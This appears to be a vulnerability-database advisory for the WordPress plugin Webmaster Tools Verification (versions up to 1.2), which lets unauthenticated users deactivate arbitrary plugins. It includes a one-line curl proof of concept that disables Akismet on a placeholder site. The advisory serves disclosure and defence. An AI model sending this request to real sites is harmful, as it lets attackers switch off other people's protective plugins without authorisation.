WordPress Plugin Vulnerabilities

Webmaster Tools Verification <= 1.2 - Unauthenticated Arbitrary Plugin Deactivation

Description

The plugin does not have authorisation and CSRF checks when disabling plugins, allowing unauthenticated users to disable arbitrary plugins

Proof of Concept

curl -X POST --data "wmtv_uninstall=1&wmtv_uninstall_confirm=1&plugin=akismet/akismet.php" https://example.com

Affects Plugins

References

Classification

Type
NO AUTHORISATION
CWE
CVSS

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-10-19 (about 1 years ago)
Added
2022-10-19 (about 1 years ago)
Last Updated
2022-10-19 (about 1 years ago)

Other